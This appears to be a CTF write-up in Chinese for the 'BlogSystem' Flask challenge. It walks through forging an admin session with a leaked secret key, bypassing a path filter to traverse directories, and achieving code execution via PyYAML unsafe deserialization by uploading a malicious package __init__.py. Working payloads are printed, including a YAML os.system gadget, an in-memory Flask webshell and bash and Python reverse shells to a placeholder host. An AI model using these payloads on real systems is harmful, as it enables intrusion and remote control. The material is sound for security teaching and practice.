BlogSystem的解题思路
题目信息
题目名 | 类型 | 难度 |
---|---|---|
BlogSystem | WEB | 中等 |
FLAG
- dasctf{test_flag}
知识点
- 信息泄露
- flask伪造session
- 目录穿越绕过
- 代码审计
- Yaml反序列化加载恶意模块
- 引入恶意模块
解题步骤
信息泄露
首先打开是一个博客系统,只有注册登陆功能。当注册一个账号登陆后发现在界面上多处了三个路由
即修改密码,查看博客,写博客。 这里再注册时候也发现了admin账号已经被人登陆过,所以考虑需不需要拿到admin
接着访问博客路由可以看到上面展示了几篇博客,其中最吸引我们注意的就是那几篇flask的文章,因为这个网站的框架就是flask。
最终在第一篇《flask基础总结》
这篇文章中发现了密钥泄露(这种情况之前也在CSDN出现过)
flask伪造session
工具:
https://github.com/noraj/flask-session-cookie-manager
解密:
python flask_session_cookie_manager3.py decode -c eyJfcGVybWFuZW50Ijp0cnVlLCJ1c2VybmFtZSI6InB5c25vdyJ9.Yz8pLA._ETuaCq8YNu0ydsgaDHq5gegTHU -s 7his_1s_my_fav0rite_ke7
正常解出,说明密钥没有问题
加密:
python flask_session_cookie_manager3.py encode -s 7his_1s_my_fav0rite_ke7 -t "{'_permanent': True, 'username': 'admin'}"
获得伪造后的session,替换到cookie去访问
目录穿越绕过
拿到admin用户后发现又多出来一个功能Download
访问发现url中参数为path,尝试目录穿越
download?path=../haipa.jpg
发现直接把我们传入的..
给删掉了
再次传参
download?path=././haipa.jpg
正常回显
download?path=.//./haipa.jpg
返回路径:static/upload/../haipa.jpg
这里也就大致可以猜到了这里的替换规则,.replace('..', '').replace('//', '')
只需要使用.//./
代替../
绕过即可完成目录穿越
代码审计
入口文件位于/app/app.py
from flask import *
import config
# config.py为配置文件
app = Flask(__name__)
app.config.from_object(config)
app.secret_key = '7his_1s_my_fav0rite_ke7'
from model import *
from view import *
# 注册了两个蓝图
app.register_blueprint(index, name='index')
app.register_blueprint(blog, name='blog')
# 一个上写文处理,判断登陆状态的
@app.context_processor
def login_statue():
username = session.get('username')
if username:
try:
user = User.query.filter(User.username == username).first()
if user:
return {"username": username, 'name': user.name, 'password': user.password}
except Exception as e:
return e
return {}
# 404处理路由
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
# 500处理路由
@app.errorhandler(500)
def internal_server_error(e):
return render_template('500.html'), 500
if __name__ == '__main__':
app.run('0.0.0.0', 80)
这里一共导入的包如下
config model view
这就是典型的MVT结构,访问view.py
发现找不到,访问view/__init__.py
发现在其中又导入了其他模块
view/__init__.py
from .index import index
from .blog import blog
接着把所有源码都给读取出来
view/index.py
from flask import Blueprint, session, render_template, request, flash, redirect, url_for, Response, send_file
from werkzeug.security import check_password_hash
from decorators import login_limit, admin_limit
from model import *
import os
index = Blueprint("index", __name__)
@index.route('/')
def hello():
return render_template('index.html')
@index.route('/register', methods=['POST', 'GET'])
def register():
if request.method == 'GET':
return render_template('register.html')
if request.method == 'POST':
name = request.form.get('name')
username = request.form.get('username')
password = request.form.get('password')
user = User.query.filter(User.username == username).first()
if user is not None:
flash("该用户名已存在")
return render_template('register.html')
else:
user = User(username=username, name=name)
user.password_hash(password)
db.session.add(user)
db.session.commit()
flash("注册成功!")
return render_template('register.html')
@index.route('/login', methods=['POST', 'GET'])
def login():
if request.method == 'GET':
return render_template('login.html')
if request.method == 'POST':
username = request.form.get('username')
password = request.form.get('password')
user = User.query.filter(User.username == username).first()
if (user is not None) and (check_password_hash(user.password, password)):
session['username'] = user.username
session.permanent = True
return redirect(url_for('index.hello'))
else:
flash("账号或密码错误")
return render_template('login.html')
@index.route("/updatePwd", methods=['POST', 'GET'])
@login_limit
def update():
if request.method == "GET":
return render_template("updatePwd.html")
if request.method == 'POST':
lodPwd = request.form.get("lodPwd")
newPwd1 = request.form.get("newPwd1")
newPwd2 = request.form.get("newPwd2")
username = session.get("username")
user = User.query.filter(User.username == username).first()
if check_password_hash(user.password, lodPwd):
if newPwd1 != newPwd2:
flash("两次新密码不一致!")
return render_template("updatePwd.html")
else:
user.password_hash(newPwd2)
db.session.commit()
flash("修改成功!")
return render_template("updatePwd.html")
else:
flash("原密码错误!")
return render_template("updatePwd.html")
# 这就是漏洞存在的那一个路由,加个一个admin的装饰器
@index.route('/download', methods=['GET'])
@admin_limit
def download():
if request.args.get('path'):
path = request.args.get('path').replace('..', '').replace('//', '')
path = os.path.join('static/upload/', path)
if os.path.exists(path):
return send_file(path)
else:
return render_template('404.html', file=path)
return render_template('sayings.html',
yaml='所谓『恶』,是那些只为了自己,利用和践踏弱者的家伙!但是,我虽然是这样,也知道什么是令人作呕的『恶』,所以,由我来制裁!')
@index.route('/logout')
def logout():
session.clear()
return redirect(url_for('index.hello'))
view/blog.py
import os
import random
import re
import time
import yaml
from flask import Blueprint, render_template, request, session
from yaml import Loader
from decorators import login_limit, admin_limit
from model import *
blog = Blueprint("blog", __name__, url_prefix="/blog")
def waf(data):
if re.search(r'apply|process|eval|os|tuple|popen|frozenset|bytes|type|staticmethod|\(|\)', str(data), re.M | re.I):
return False
else:
return True
@blog.route('/writeBlog', methods=['POST', 'GET'])
@login_limit
def writeblog():
if request.method == 'GET':
return render_template('writeBlog.html')
if request.method == 'POST':
title = request.form.get("title")
text = request.form.get("text")
username = session.get('username')
create_time = time.strftime("%Y-%m-%d %H:%M:%S")
user = User.query.filter(User.username == username).first()
blog = Blog(title=title, text=text, create_time=create_time, user_id=user.id)
db.session.add(blog)
db.session.commit()
blog = Blog.query.filter(Blog.create_time == create_time).first()
return render_template('blogSuccess.html', title=title, id=blog.id)
@blog.route('/imgUpload', methods=['POST'])
@login_limit
def imgUpload():
try:
file = request.files.get('editormd-image-file')
fileName = file.filename.replace('..','')
filePath = os.path.join("static/upload/", fileName)
file.save(filePath)
return {
'success': 1,
'message': '上传成功!',
'url': "/" + filePath
}
except Exception as e:
return {
'success': 0,
'message': '上传失败'
}
@blog.route('/showBlog/<id>')
def showBlog(id):
blog = Blog.query.filter(Blog.id == id).first()
comment = Comment.query.filter(Comment.blog_id == blog.id)
return render_template("showBlog.html", blog=blog, comment=comment)
@blog.route("/blogAll")
def blogAll():
blogList = Blog.query.order_by(Blog.create_time.desc()).all()
return render_template('blogAll.html', blogList=blogList)
@blog.route("/update/<id>", methods=['POST', 'GET'])
@login_limit
def update(id):
if request.method == 'GET':
blog = Blog.query.filter(Blog.id == id).first()
return render_template('updateBlog.html', blog=blog)
if request.method == 'POST':
id = request.form.get("id")
title = request.form.get("title")
text = request.form.get("text")
blog = Blog.query.filter(Blog.id == id).first()
blog.title = title
blog.text = text
db.session.commit()
return render_template('blogSuccess.html', title=title, id=id)
@blog.route("/delete/<id>")
@login_limit
def delete(id):
blog = Blog.query.filter(Blog.id == id).first()
db.session.delete(blog)
db.session.commit()
return {
'state': True,
'msg': "删除成功!"
}
@blog.route("/myBlog")
@login_limit
def myBlog():
username = session.get('username')
user = User.query.filter(User.username == username).first()
blogList = Blog.query.filter(Blog.user_id == user.id).order_by(Blog.create_time.desc()).all()
return render_template("myBlog.html", blogList=blogList)
@blog.route("/comment", methods=['POST'])
@login_limit
def comment():
text = request.values.get('text')
blogId = request.values.get('blogId')
username = session.get('username')
create_time = time.strftime("%Y-%m-%d %H:%M:%S")
user = User.query.filter(User.username == username).first()
comment = Comment(text=text, create_time=create_time, blog_id=blogId, user_id=user.id)
db.session.add(comment)
db.session.commit()
return {
'success': True,
'message': '评论成功!',
}
@blog.route('/myComment')
@login_limit
def myComment():
username = session.get('username')
user = User.query.filter(User.username == username).first()
commentList = Comment.query.filter(Comment.user_id == user.id).order_by(Comment.create_time.desc()).all()
return render_template("myComment.html", commentList=commentList)
@blog.route('/deleteCom/<id>')
def deleteCom(id):
com = Comment.query.filter(Comment.id == id).first()
db.session.delete(com)
db.session.commit()
return {
'state': True,
'msg': "删除成功!"
}
@blog.route('/saying', methods=['GET'])
@admin_limit
def Saying():
if request.args.get('path'):
file = request.args.get('path').replace('../', 'hack').replace('..\\', 'hack')
try:
with open(file, 'rb') as f:
f = f.read()
if waf(f):
print(yaml.load(f, Loader=Loader))
return render_template('sayings.html', yaml='鲁迅说:当你看到这句话时,还没有拿到flag,那就赶紧重开环境吧')
else:
return render_template('sayings.html', yaml='鲁迅说:你说得不对')
except Exception as e:
return render_template('sayings.html', yaml='鲁迅说:'+str(e))
else:
with open('view/jojo.yaml', 'r', encoding='utf-8') as f:
sayings = yaml.load(f, Loader=Loader)
saying = random.choice(sayings)
return render_template('sayings.html', yaml=saying)
因为这里用的是ORM操作数据库,也就懒得去看modole的源码了
大致审计一下可以把主要代码省略如下
@blog.route('/imgUpload', methods=['POST'])
@login_limit
def imgUpload():
try:
file = request.files.get('editormd-image-file')
fileName = file.filename.replace('..','')
filePath = os.path.join("static/upload/", fileName)
file.save(filePath)
return {
'success': 1,
'message': '上传成功!',
'url': "/" + filePath
}
except Exception as e:
return {
'success': 0,
'message': '上传失败'
}
这是一个文件上传的路由,没有直接用secure
函数去操作文件名,而是使用了一个替换,虽然不能造成目录穿越,但是终究还是比secure操作之后的可利用性更大一些
@blog.route('/saying', methods=['GET'])
@admin_limit
def Saying():
if request.args.get('path'):
file = request.args.get('path').replace('../', 'hack').replace('..\\', 'hack')
try:
with open(file, 'rb') as f:
f = f.read()
if waf(f):
print(yaml.load(f, Loader=Loader))
return render_template('sayings.html', yaml='鲁迅说:当你看到这句话时,还没有拿到flag,那就赶紧重开环境吧')
else:
return render_template('sayings.html', yaml='鲁迅说:你说得不对')
except Exception as e:
return render_template('sayings.html', yaml='鲁迅说:'+str(e))
else:
with open('view/jojo.yaml', 'r', encoding='utf-8') as f:
sayings = yaml.load(f, Loader=Loader)
saying = random.choice(sayings)
return render_template('sayings.html', yaml=saying)
接着是一个前端没有展示的路由/blog/saying
,直接GET去访问的话会随机出现一些名言
仔细阅读上面的代码发现,当我们传入一个path参数的时候,会对那个文件进行yaml.load加载操作,而且这里使用的还是一个不安全的构造器, Loader
,这里再配合上之前的那个文件上传操作就那个达到yaml反序列化的目的
Yaml反序列化绕过
但是回头一看发现这里对文件内容进行了waf过滤,代码如下:
def waf(data):
if re.search(r'apply|process|eval|os|tuple|popen|frozenset|bytes|type|staticmethod|\(|\)', str(data), re.M | re.I):
return False
else:
return True
这里的waf我故意设计得感觉可以绕过,实际上不能绕过,要不然我就直接把object给过滤了(当然也可能师傅有方法绕过,如果有务必让我膜拜一下)
我们可以知道PyYAML反序列化执行命令的标签就那几个
!!python/object
!!python/object/apply
!!python/object/new
简单看一下第一个因为合适的模块不能执行,第二个被waf写死了,第三个可以操作细讲
new跟apply查看源码可以发现他们最后进入的是同一个函数,所以payload是可以通用的,这里最简单的执行命令的payload如下
!!python/object/new:os.system
- calc
但是这里有个头疼的地方就是我基本把python所有命令执行的方法都给ban(不知道ban完没)
接着尝试使用内建模块builtin来想办法执行命令,因为我这里值过滤了eval没有过滤exec
使用之前网鼎杯2022青龙组的一道web的payload试试(这个文章我在这道题的博客里面放得有)
!!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('whoami')"]
发现唯一需要绕过的地方就是tutple,也就是寻找不可变对象,我把上次网鼎杯用的那两个payload都加到黑名单了,不知道各位有没有找到新的不可变对象,总之据我所知这里可用的就只有(除去str,int这类)
tuple
bytes
type
frozenset
很显然这些都过了,接着就是利用listitems
,state
等绕过,虽然没有直接过滤这些,但是实际上也很难想出绕过方法。但是这里因为我用的是Loader加载器,而不是默认的FullLoader,所以就怕在这里被非预期了
引入恶意模块
峰会路转,回头想一想,既然不能直接通过Yaml执行命令,那可不可以间接执行命令呢,Yaml还提供了两个标签
python/module
python/name
他们的作用可以理解为导入模块,如果我们能够构造一个恶意的py脚本或者软件包,然后调用到他就可以实现任意代码执行的目的,具体这两个标签的操作方法可以参考 https://www.tr0y.wang/2022/06/06/SecMap-unserialize-pyyaml/
但是这里又存在一个问题,就是我们可控的目录在第三层,那么我们要怎么在不能目录穿越的情况下导入那个我们可控的脚本呢
很显然可以使用__init__.py
,将upload整个文件夹看做是一个软件包,位于static模块下,poc.yaml可以这样编写
!!python/module:static.upload
接着就是编写__init__
的内容,这里可以直接反弹shell,但是在用/dev/tcp进行反弹的时候貌似只能bash - c "bash -i"
,所以我这里推荐Python的反弹shell,当然我为了自己方便编写exp,我就直接使用内存马的方式进行命令执行
from flask import *
eval(
"app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('shell')).read())",
{'_request_ctx_stack': url_for.__globals__['_request_ctx_stack'], 'app': url_for.__globals__['current_app']})
# 生成一个shell路由,参数为shell
import os
os.system('bash -c "bash -i >& /dev/tcp/xxx/2333 0>&1"')
import os,pty,socket;s=socket.socket();s.connect(("xxx",2333));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")
然后访问blog/saying?path=static/upload/poc1.yaml
生成路由
特别说明
因为flask的特殊性,这里只能成功加载一次,所以假如你第一次使用的sh反弹shell虽然成功加载但是没有连上shell,那就说明执行了命令,但是那个命令刚好是不行的。这个时候也就不能重新覆盖文件再次加载了,只能重开靶机。所以我也贴心的在加载成功后给了一个提示
5 条评论
tql师傅
tql
snow师傅很猛
如果这只能算中等
很牛